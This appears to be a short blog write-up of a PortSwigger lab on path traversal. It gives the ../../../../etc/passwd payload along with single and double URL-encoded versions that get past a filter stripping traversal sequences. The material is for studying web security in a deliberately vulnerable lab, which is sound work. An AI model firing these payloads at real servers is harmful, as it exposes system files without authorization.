PortSwigger - Directory Traversal - Lab 4

Posted Jun 10, 2024 Updated Oct 26, 2024

By Jaco Zwarts 1 min read

Lab 4 - Directory Traversal - File path traversal, traversal sequences stripped with superfluous URL-decode

Lab Objective:

This lab contains a path traversal vulnerability in the display of product images. The application blocks input containing path traversal sequences. It then performs a URL-decode of the input before using it.

To solve the lab, retrieve the contents of the /etc/passwd file.

Reference:
Port Swigger - Lab 4
Rana Khalil - Lab 4

Solution

1. No encoding:

2. Double url encode the payload

../../../../etc/passwd

First URL encoding:

%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64%20

Second URL encoding:

%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%36%35%25%37%34%25%36%33%25%32%66%25%37%30%25%36%31%25%37%33%25%37%33%25%37%37%25%36%34 

directory-traversal bscp

This post is licensed under CC BY 4.0 by the author.

Trending Tags

bscp authentication cbbh directory-traversal command-injection business-logic-vulnerability checklist recon brute-forcing file-upload-attacks